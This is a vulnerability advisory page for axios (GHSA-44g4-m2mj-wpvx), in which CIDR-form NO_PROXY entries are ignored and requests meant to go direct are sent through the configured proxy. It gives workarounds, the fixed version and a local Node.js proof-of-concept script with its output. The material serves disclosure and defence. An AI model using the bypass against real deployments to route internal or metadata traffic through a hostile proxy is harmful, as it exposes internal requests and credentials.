GHSA-44G4-M2MJ-WPVX

Vulnerability from github – Published: 2026-09-30 15:32 – Updated: 2026-09-30 15:32
VLAI
Summary
Axios: CIDR-form NO_PROXY entries are ignored, causing proxy exclusion bypass for internal IP ranges
Details

Summary

Axios supports proxy environment variables and evaluates NO_PROXY exclusions in the Node.js adapter. CIDR-form NO_PROXY entries such as 127.0.0.0/8, 10.0.0.0/8, or 169.254.169.254/32 are not interpreted as IP ranges. As a result, a request to an IP address inside a configured CIDR exclusion can still be sent through the configured proxy.

This affects deployments that rely on CIDR notation to keep loopback, private, Kubernetes, CI, or cloud metadata traffic away from proxy infrastructure.

Impact

If the configured proxy is outside the intended trust boundary, requests that operators expected to bypass the proxy may be exposed to it. For plaintext HTTP targets, the proxy can see and modify URLs, headers, and bodies. For HTTPS targets, the proxy still observes connection metadata and may receive CONNECT requests that policy expected to avoid.

This is a proxy exclusion bypass, not arbitrary proxy injection by itself.

Affected Functionality

Affected:

  • Node.js adapter proxy environment handling.
  • HTTP_PROXY, HTTPS_PROXY, NO_PROXY, or lowercase equivalents.
  • CIDR entries in NO_PROXY.

Not affected:

  • Exact host or exact IP NO_PROXY entries where axios matching succeeds.
  • Requests configured with proxy: false.
  • Browser adapters.

Technical Details

lib/helpers/shouldBypassProxy.js parses each NO_PROXY entry into a host and optional port, normalizes hostnames, and then compares exact hostnames, suffix entries, wildcard-prefix entries, and loopback equivalents. It does not parse CIDR notation.

Local verification on axios 1.18.1:

process.env.NO_PROXY = '127.0.0.0/8';
shouldBypassProxy('http://127.0.0.1:1234/'); // false

The expected result for CIDR-aware bypass policy is true.

Proof of Concept of Attack

Constrained local demonstration:

  1. Set HTTP_PROXY=http://127.0.0.1:<proxy-port>.
  2. Set NO_PROXY=127.0.0.0/8.
  3. Request http://127.0.0.1:<internal-port>/metadata.
  4. Observe that axios sends the request through the proxy instead of directly to the internal listener.

Workarounds

Use exact host or IP entries in NO_PROXY for sensitive destinations until CIDR matching is fixed, for example 127.0.0.1,localhost,169.254.169.254. For individual requests that must not use a proxy, set proxy: false.

Original report

## Summary Axios 1.17.0 honors `HTTP_PROXY` / `HTTPS_PROXY` and supports `NO_PROXY` host exclusions, but CIDR-form `NO_PROXY` entries such as `127.0.0.0/8` are not treated as network ranges. As a result, requests to IPs covered by a configured CIDR exclusion may still be sent through the configured proxy. In the attached PoC, a request to `127.0.0.1` is sent through `HTTP_PROXY` despite `NO_PROXY=127.0.0.0/8`. This can cause proxy exclusion bypass in environments where operators use CIDR notation to exclude loopback, private, internal, Kubernetes, CI, or cloud metadata address ranges from proxying. ## Details Axios supports proxy environment variables, including `HTTP_PROXY` / `HTTPS_PROXY` and `NO_PROXY`-style exclusions. Axios’s threat model treats environment proxy handling as security-relevant and lists `NO_PROXY` as a mitigation for proxy environment variable hijack, including hardening for CIDR ranges, IPv6 literals, and wildcard patterns. See: https://github.com/axios/axios/blob/a8e4f13aeecc45a3b8fab3ecfd9ddb5d70fb772b/THREATMODEL.md#t-r9-proxy-environment-variable-hijack The issue is that CIDR-form `NO_PROXY` entries are not interpreted as network ranges. For example:
NO_PROXY=127.0.0.0/8
HTTP_PROXY=http://127.0.0.1:<proxy-port>
Target URL=http://127.0.0.1:<internal-port>/metadata
Since `127.0.0.1` is inside `127.0.0.0/8`, an operator may reasonably expect Axios to bypass the proxy for this request. Instead, Axios sends the request through `HTTP_PROXY`. This appears to affect the proxy bypass decision path used for `NO_PROXY` / `no_proxy` handling. The relevant behavior is in Axios's Node proxy handling and `NO_PROXY` evaluation logic, including the `shouldBypassProxy` helper introduced for `no_proxy` hostname normalization and bypass checks. The issue is not that Axios ignores `NO_PROXY` entirely. Exact host exclusions work. The issue is specifically that CIDR-form exclusions are silently treated as non-matching host/domain tokens rather than as network ranges, causing the request to be proxied. This is security-relevant because CIDR notation is commonly used in container, CI, enterprise proxy, and cloud environments for ranges such as:
127.0.0.0/8
10.0.0.0/8
172.16.0.0/12
192.168.0.0/16
169.254.169.254/32
If operators rely on those entries to prevent internal or metadata-style requests from traversing a proxy, Axios may violate that expectation. ## PoC
import http from 'http';
import axios from 'axios';

function listen(server, host) {
  return new Promise((resolve, reject) => {
    server.once('error', reject);
    server.listen(0, host, () => resolve(server.address().port));
  });
}

function close(server) {
  return new Promise((resolve) => server.close(resolve));
}

let proxyHits = 0;
let internalHits = 0;

const internal = http.createServer((req, res) => {
  internalHits += 1;
  res.writeHead(200, { 'content-type': 'text/plain' });
  res.end(`internal service saw ${req.url}`);
});

const proxy = http.createServer((req, res) => {
  proxyHits += 1;
  res.writeHead(200, { 'content-type': 'text/plain' });
  res.end(`proxy saw request for ${req.url}`);
});

const internalHost = process.env.POC_INTERNAL_HOST || '127.0.0.2';
const proxyHost = process.env.POC_PROXY_HOST || '127.0.0.1';

let internalPort;
let proxyPort;

try {
  internalPort = await listen(internal, internalHost);
  proxyPort = await listen(proxy, proxyHost);
} catch (error) {
  console.error('Failed to bind local PoC servers.');
  console.error('On some systems 127.0.0.2 is unavailable; try:');
  console.error('  POC_INTERNAL_HOST=127.0.0.1 node poc-no-proxy-cidr-axios.mjs');
  console.error('');
  throw error;
}

const targetUrl = `http://${internalHost}:${internalPort}/metadata`;
const proxyUrl = `http://${proxyHost}:${proxyPort}`;
const noProxy = process.env.POC_NO_PROXY || '127.0.0.0/8';

process.env.http_proxy = proxyUrl;
process.env.HTTP_PROXY = proxyUrl;
process.env.no_proxy = noProxy;
process.env.NO_PROXY = noProxy;

console.log('Axios NO_PROXY CIDR full axios network PoC');
console.log(`axios VERSION=${axios.VERSION || 'unknown'}`);
console.log(`NO_PROXY=${process.env.no_proxy}`);
console.log(`HTTP_PROXY=${process.env.http_proxy}`);
console.log(`Target URL=${targetUrl}`);
console.log('');

try {
  const response = await axios.get(targetUrl, {
    timeout: 2000,
  });

  console.log(`Response=${response.data}`);
  console.log(`Proxy hits=${proxyHits}`);
  console.log(`Internal direct hits=${internalHits}`);
  console.log('');

  if (proxyHits > 0 && internalHits === 0) {
    console.log(`POC RESULT: axios sent the target through the proxy with NO_PROXY=${noProxy}.`);
  } else if (proxyHits === 0 && internalHits > 0) {
    console.log(`POC RESULT: axios bypassed the proxy with NO_PROXY=${noProxy}.`);
  } else {
    console.log('POC RESULT: mixed/ambiguous routing; inspect counts above.');
  }
} finally {
  delete process.env.http_proxy;
  delete process.env.HTTP_PROXY;
  delete process.env.no_proxy;
  delete process.env.NO_PROXY;
  await close(proxy);
  await close(internal);
}
Run the failing CIDR case:
POC_INTERNAL_HOST=127.0.0.1 node poc-no-proxy-cidr-axios.mjs
Observed:
Axios NO_PROXY CIDR full axios network PoC
axios VERSION=1.17.0
NO_PROXY=127.0.0.0/8
HTTP_PROXY=http://127.0.0.1:34315
Target URL=http://127.0.0.1:43993/metadata

Response=proxy saw request for http://127.0.0.1:43993/metadata
Proxy hits=1
Internal direct hits=0

POC RESULT: axios sent the target through the proxy with NO_PROXY=127.0.0.0/8.
## Control Axios does honor exact IP `NO_PROXY` entries:
POC_INTERNAL_HOST=127.0.0.1 POC_NO_PROXY=127.0.0.1 node poc-no-proxy-cidr-axios.mjs
Expected:
NO_PROXY=127.0.0.1
Response=internal service saw /metadata
Proxy hits=0
Internal direct hits=1

POC RESULT: axios bypassed the proxy with NO_PROXY=127.0.0.1.
This shows the issue is not that `NO_PROXY` is ignored entirely. The bypass failure is specific to CIDR-form entries such as `127.0.0.0/8`. ## Impact This is a proxy exclusion bypass caused by unsupported CIDR matching in `NO_PROXY`. The impact is configuration-dependent. It affects Axios users in Node.js environments who rely on proxy environment variables and configure `NO_PROXY` using CIDR notation to exclude internal, loopback, private, Kubernetes, CI, or cloud metadata ranges. Potentially impacted environments include: - CI/CD runners with globally injected `HTTP_PROXY` / `HTTPS_PROXY`. - Containers inheriting proxy variables from the host or orchestrator. - Kubernetes workloads using `NO_PROXY` for cluster-internal service ranges. - Enterprise networks using HTTP proxies with internal network exclusions. - Cloud workloads relying on `NO_PROXY` to keep metadata or internal service requests off proxy infrastructure. If a configured proxy is compromised, attacker-controlled, overly broad, or outside the intended trust boundary, requests that operators expected to stay direct may instead be exposed to that proxy. This may expose request URLs, internal hostnames, paths, headers, or credentials depending on application behavior. This should not be characterized as arbitrary proxy injection by itself. The issue is that Axios silently fails to enforce common CIDR-form proxy exclusions, which can undermine proxy bypass policy and defense-in-depth assumptions.
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "axios"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.15.0"
            },
            {
              "fixed": "1.20.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-101899"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-693"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-09-30T15:32:30Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nAxios supports proxy environment variables and evaluates `NO_PROXY` exclusions in the Node.js adapter. CIDR-form `NO_PROXY` entries such as `127.0.0.0/8`, `10.0.0.0/8`, or `169.254.169.254/32` are not interpreted as IP ranges. As a result, a request to an IP address inside a configured CIDR exclusion can still be sent through the configured proxy.\n\nThis affects deployments that rely on CIDR notation to keep loopback, private, Kubernetes, CI, or cloud metadata traffic away from proxy infrastructure.\n\n## Impact\n\nIf the configured proxy is outside the intended trust boundary, requests that operators expected to bypass the proxy may be exposed to it. For plaintext HTTP targets, the proxy can see and modify URLs, headers, and bodies. For HTTPS targets, the proxy still observes connection metadata and may receive CONNECT requests that policy expected to avoid.\n\nThis is a proxy exclusion bypass, not arbitrary proxy injection by itself.\n\n## Affected Functionality\n\nAffected:\n\n- Node.js adapter proxy environment handling.\n- `HTTP_PROXY`, `HTTPS_PROXY`, `NO_PROXY`, or lowercase equivalents.\n- CIDR entries in `NO_PROXY`.\n\nNot affected:\n\n- Exact host or exact IP `NO_PROXY` entries where axios matching succeeds.\n- Requests configured with `proxy: false`.\n- Browser adapters.\n\n## Technical Details\n\n`lib/helpers/shouldBypassProxy.js` parses each `NO_PROXY` entry into a host and optional port, normalizes hostnames, and then compares exact hostnames, suffix entries, wildcard-prefix entries, and loopback equivalents. It does not parse CIDR notation.\n\nLocal verification on axios `1.18.1`:\n\n```js\nprocess.env.NO_PROXY = \u0027127.0.0.0/8\u0027;\nshouldBypassProxy(\u0027http://127.0.0.1:1234/\u0027); // false\n```\n\nThe expected result for CIDR-aware bypass policy is `true`.\n\n## Proof of Concept of Attack\n\nConstrained local demonstration:\n\n1. Set `HTTP_PROXY=http://127.0.0.1:\u003cproxy-port\u003e`.\n2. Set `NO_PROXY=127.0.0.0/8`.\n3. Request `http://127.0.0.1:\u003cinternal-port\u003e/metadata`.\n4. Observe that axios sends the request through the proxy instead of directly to the internal listener.\n\n## Workarounds\n\nUse exact host or IP entries in `NO_PROXY` for sensitive destinations until CIDR matching is fixed, for example `127.0.0.1,localhost,169.254.169.254`. For individual requests that must not use a proxy, set `proxy: false`.\n\n\u003cdetails\u003e\n  \u003csummary\u003e\u003ch3\u003eOriginal report\u003c/h3\u003e\u003c/summary\u003e\n  \n## Summary\n\nAxios 1.17.0 honors `HTTP_PROXY` / `HTTPS_PROXY` and supports `NO_PROXY` host exclusions, but CIDR-form `NO_PROXY` entries such as `127.0.0.0/8` are not treated as network ranges. As a result, requests to IPs covered by a configured CIDR exclusion may still be sent through the configured proxy.\n\nIn the attached PoC, a request to `127.0.0.1` is sent through `HTTP_PROXY` despite `NO_PROXY=127.0.0.0/8`.\n\nThis can cause proxy exclusion bypass in environments where operators use CIDR notation to exclude loopback, private, internal, Kubernetes, CI, or cloud metadata address ranges from proxying.\n\n## Details\n\nAxios supports proxy environment variables, including `HTTP_PROXY` / `HTTPS_PROXY` and `NO_PROXY`-style exclusions. Axios\u2019s threat model treats environment proxy handling as security-relevant and lists `NO_PROXY` as a mitigation for proxy environment variable hijack, including hardening for CIDR ranges, IPv6 literals, and wildcard patterns. See: https://github.com/axios/axios/blob/a8e4f13aeecc45a3b8fab3ecfd9ddb5d70fb772b/THREATMODEL.md#t-r9-proxy-environment-variable-hijack\n\nThe issue is that CIDR-form `NO_PROXY` entries are not interpreted as network ranges. For example:\n\n```text\nNO_PROXY=127.0.0.0/8\nHTTP_PROXY=http://127.0.0.1:\u003cproxy-port\u003e\nTarget URL=http://127.0.0.1:\u003cinternal-port\u003e/metadata\n```\n\nSince `127.0.0.1` is inside `127.0.0.0/8`, an operator may reasonably expect Axios to bypass the proxy for this request. Instead, Axios sends the request through `HTTP_PROXY`.\n\nThis appears to affect the proxy bypass decision path used for `NO_PROXY` / `no_proxy` handling. The relevant behavior is in Axios\u0027s Node proxy handling and `NO_PROXY` evaluation logic, including the `shouldBypassProxy` helper introduced for `no_proxy` hostname normalization and bypass checks.\n\nThe issue is not that Axios ignores `NO_PROXY` entirely. Exact host exclusions work. The issue is specifically that CIDR-form exclusions are silently treated as non-matching host/domain tokens rather than as network ranges, causing the request to be proxied.\n\nThis is security-relevant because CIDR notation is commonly used in container, CI, enterprise proxy, and cloud environments for ranges such as:\n\n```text\n127.0.0.0/8\n10.0.0.0/8\n172.16.0.0/12\n192.168.0.0/16\n169.254.169.254/32\n```\n\nIf operators rely on those entries to prevent internal or metadata-style requests from traversing a proxy, Axios may violate that expectation.\n\n## PoC\n\n```js\nimport http from \u0027http\u0027;\nimport axios from \u0027axios\u0027;\n\nfunction listen(server, host) {\n  return new Promise((resolve, reject) =\u003e {\n    server.once(\u0027error\u0027, reject);\n    server.listen(0, host, () =\u003e resolve(server.address().port));\n  });\n}\n\nfunction close(server) {\n  return new Promise((resolve) =\u003e server.close(resolve));\n}\n\nlet proxyHits = 0;\nlet internalHits = 0;\n\nconst internal = http.createServer((req, res) =\u003e {\n  internalHits += 1;\n  res.writeHead(200, { \u0027content-type\u0027: \u0027text/plain\u0027 });\n  res.end(`internal service saw ${req.url}`);\n});\n\nconst proxy = http.createServer((req, res) =\u003e {\n  proxyHits += 1;\n  res.writeHead(200, { \u0027content-type\u0027: \u0027text/plain\u0027 });\n  res.end(`proxy saw request for ${req.url}`);\n});\n\nconst internalHost = process.env.POC_INTERNAL_HOST || \u0027127.0.0.2\u0027;\nconst proxyHost = process.env.POC_PROXY_HOST || \u0027127.0.0.1\u0027;\n\nlet internalPort;\nlet proxyPort;\n\ntry {\n  internalPort = await listen(internal, internalHost);\n  proxyPort = await listen(proxy, proxyHost);\n} catch (error) {\n  console.error(\u0027Failed to bind local PoC servers.\u0027);\n  console.error(\u0027On some systems 127.0.0.2 is unavailable; try:\u0027);\n  console.error(\u0027  POC_INTERNAL_HOST=127.0.0.1 node poc-no-proxy-cidr-axios.mjs\u0027);\n  console.error(\u0027\u0027);\n  throw error;\n}\n\nconst targetUrl = `http://${internalHost}:${internalPort}/metadata`;\nconst proxyUrl = `http://${proxyHost}:${proxyPort}`;\nconst noProxy = process.env.POC_NO_PROXY || \u0027127.0.0.0/8\u0027;\n\nprocess.env.http_proxy = proxyUrl;\nprocess.env.HTTP_PROXY = proxyUrl;\nprocess.env.no_proxy = noProxy;\nprocess.env.NO_PROXY = noProxy;\n\nconsole.log(\u0027Axios NO_PROXY CIDR full axios network PoC\u0027);\nconsole.log(`axios VERSION=${axios.VERSION || \u0027unknown\u0027}`);\nconsole.log(`NO_PROXY=${process.env.no_proxy}`);\nconsole.log(`HTTP_PROXY=${process.env.http_proxy}`);\nconsole.log(`Target URL=${targetUrl}`);\nconsole.log(\u0027\u0027);\n\ntry {\n  const response = await axios.get(targetUrl, {\n    timeout: 2000,\n  });\n\n  console.log(`Response=${response.data}`);\n  console.log(`Proxy hits=${proxyHits}`);\n  console.log(`Internal direct hits=${internalHits}`);\n  console.log(\u0027\u0027);\n\n  if (proxyHits \u003e 0 \u0026\u0026 internalHits === 0) {\n    console.log(`POC RESULT: axios sent the target through the proxy with NO_PROXY=${noProxy}.`);\n  } else if (proxyHits === 0 \u0026\u0026 internalHits \u003e 0) {\n    console.log(`POC RESULT: axios bypassed the proxy with NO_PROXY=${noProxy}.`);\n  } else {\n    console.log(\u0027POC RESULT: mixed/ambiguous routing; inspect counts above.\u0027);\n  }\n} finally {\n  delete process.env.http_proxy;\n  delete process.env.HTTP_PROXY;\n  delete process.env.no_proxy;\n  delete process.env.NO_PROXY;\n  await close(proxy);\n  await close(internal);\n}\n```\n\nRun the failing CIDR case:\n\n```bash\nPOC_INTERNAL_HOST=127.0.0.1 node poc-no-proxy-cidr-axios.mjs\n```\n\nObserved:\n\n```text\nAxios NO_PROXY CIDR full axios network PoC\naxios VERSION=1.17.0\nNO_PROXY=127.0.0.0/8\nHTTP_PROXY=http://127.0.0.1:34315\nTarget URL=http://127.0.0.1:43993/metadata\n\nResponse=proxy saw request for http://127.0.0.1:43993/metadata\nProxy hits=1\nInternal direct hits=0\n\nPOC RESULT: axios sent the target through the proxy with NO_PROXY=127.0.0.0/8.\n```\n\n## Control\n\nAxios does honor exact IP `NO_PROXY` entries:\n\n```bash\nPOC_INTERNAL_HOST=127.0.0.1 POC_NO_PROXY=127.0.0.1 node poc-no-proxy-cidr-axios.mjs\n```\n\nExpected:\n\n```text\nNO_PROXY=127.0.0.1\nResponse=internal service saw /metadata\nProxy hits=0\nInternal direct hits=1\n\nPOC RESULT: axios bypassed the proxy with NO_PROXY=127.0.0.1.\n```\n\nThis shows the issue is not that `NO_PROXY` is ignored entirely. The bypass failure is specific to CIDR-form entries such as `127.0.0.0/8`.\n\n## Impact\n\nThis is a proxy exclusion bypass caused by unsupported CIDR matching in `NO_PROXY`.\n\nThe impact is configuration-dependent. It affects Axios users in Node.js environments who rely on proxy environment variables and configure `NO_PROXY` using CIDR notation to exclude internal, loopback, private, Kubernetes, CI, or cloud metadata ranges.\n\nPotentially impacted environments include:\n\n- CI/CD runners with globally injected `HTTP_PROXY` / `HTTPS_PROXY`.\n- Containers inheriting proxy variables from the host or orchestrator.\n- Kubernetes workloads using `NO_PROXY` for cluster-internal service ranges.\n- Enterprise networks using HTTP proxies with internal network exclusions.\n- Cloud workloads relying on `NO_PROXY` to keep metadata or internal service requests off proxy infrastructure.\n\nIf a configured proxy is compromised, attacker-controlled, overly broad, or outside the intended trust boundary, requests that operators expected to stay direct may instead be exposed to that proxy. This may expose request URLs, internal hostnames, paths, headers, or credentials depending on application behavior.\n\nThis should not be characterized as arbitrary proxy injection by itself. The issue is that Axios silently fails to enforce common CIDR-form proxy exclusions, which can undermine proxy bypass policy and defense-in-depth assumptions.\n\u003c/details\u003e\n\n---",
  "id": "GHSA-44g4-m2mj-wpvx",
  "modified": "2026-09-30T15:32:30Z",
  "published": "2026-09-30T15:32:30Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/axios/axios/security/advisories/GHSA-44g4-m2mj-wpvx"
    },
    {
      "type": "WEB",
      "url": "https://github.com/axios/axios/pull/11141"
    },
    {
      "type": "WEB",
      "url": "https://github.com/axios/axios/commit/d19040bda7a8be2f82c3c6e1a5bc03917daee39a"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/axios/axios"
    },
    {
      "type": "WEB",
      "url": "https://github.com/axios/axios/releases/tag/v1.20.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Axios: CIDR-form NO_PROXY entries are ignored, causing proxy exclusion bypass for internal IP ranges"
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Loading…

Loading…

Related by attack behaviour

Vulnerabilities whose description is nearest to this one in the vector space of the CIRCL/vulnerability-attack-technique-biencoder model. This is a similarity search over the bi-encoder space (plain cosine), not a classification, and it has no measured accuracy.


Loading…